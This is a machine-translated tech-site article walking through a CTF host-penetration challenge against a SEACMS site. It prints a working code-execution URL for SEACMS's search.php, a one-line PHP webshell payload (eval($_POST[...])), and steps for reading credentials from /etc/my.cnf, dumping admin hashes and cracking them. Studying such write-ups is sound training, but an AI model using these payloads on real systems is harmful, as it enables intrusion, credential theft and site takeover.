Shulou(Shulou.com)05/31 Report--

This article mainly introduces the relevant knowledge of "CTF host penetration actual combat analysis". The editor shows you the operation process through the actual case, the operation method is simple, fast and practical. I hope this "CTF host infiltration actual combat analysis" article can help you solve the problem.

The question of actual combat is as follows:

This question needs to get a total of 5 flag, where to start?

Step 1: first, let's open the connection address: http://202.0.0.206

Step 2: vulnerability analysis

According to the analysis, this question is a SEACMS platform system.

This version learned about a code execution vulnerability through other forum platforms. Exp:/search.php?searchtype=5&tid=&area=phpinfo (). Let's try that this vulnerability can be exploited. Directly in the following phpinfo (), you can execute arbitrary php code and directly access http:// 202.0.0.206/search.php?searchtype=5&tid=&area=phpinfo () to find that phpinfo () executes successfully, indicating that the vulnerability exists.

Let's try to see if there is flag in the source code. Right-click on the source code of this page, and there is indeed a flag= flag1 {ac727d1a3130e4093b3665120a3240a5} in the source code.

Step 3: in a word, Trojans use

Next we use a word Trojan horse to take advantage of.

Use exp:/search.php?searchtype=5&tid=&area=eval ($_ post [simple]) to construct an one-sentence pony.

Open the tool knife and fill in the address bar

Http://202.0.0.206/search.php?searchtype=5&tid=&area=eval($_POST[simple]), password is simple, click add

The connection is successful, as follows:

Step 4: messing around

The next is time-consuming to find, such as thieves into the house, no purpose can only be turned at random!

It takes a long time to find a key file in the / home directory. Open the file and get the flag2=.

Flag2 {6634eaf4ce34a82da12d835c1ed86a24}

The my.cnf configuration file for the database mysql in the / etc directory. Found flag3 and database-related account information. Flag3 {da04113d21f02f0ebfd281d0a7a64e34}, and get the password of the database.

Step 5: database operation

In the previous step, get the user name and password about the database, use the user name and password, reconfigure the kitchen knife, and connect to the database.

Submit to open the database, and in the flag table in seacms, find a flag= flag4 {32730c5cc0bd7bb8ffde4457649fd409}

Query the account password of the backend of seacms in the database.

SELECT `name` FROM `sea_ admin`

SELECT `password` FROM `sea_ admin`

Step 6: password cracking

The password obtained is MD5 encryption, the password is: 23a7bbd73250516f069d Baidu MD5 online decryption, it is found that the encryption value is 20 bits, using the same encryption method as dedecms, the first three bits and the last bit of the encryption value are removed, that is, 16-bit MD5 encryption, and the online decryption result is admin123.

Step 6: find the background login page

Next, find the background login page of the website, where we use the DirBuster tool.

Using the username and password already obtained in the database, the login site background password is admin123.

All right, the login is successful, we have got the background login page, and we can log in using the administrator account.

Step 7: messing around

After wandering in the background for a long time, I finally found key5 when I was looking for a planned task in the background of the website.

Flag5 {f01cbadfd0daee0d65c2502a38581558}

Finally, so far, all five flag have been found, and then we put five flag in the answer box.

This is the end of the content of "actual combat analysis of CTF host penetration". Thank you for your reading. If you want to know more about the industry, you can follow the industry information channel. The editor will update different knowledge points for you every day.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.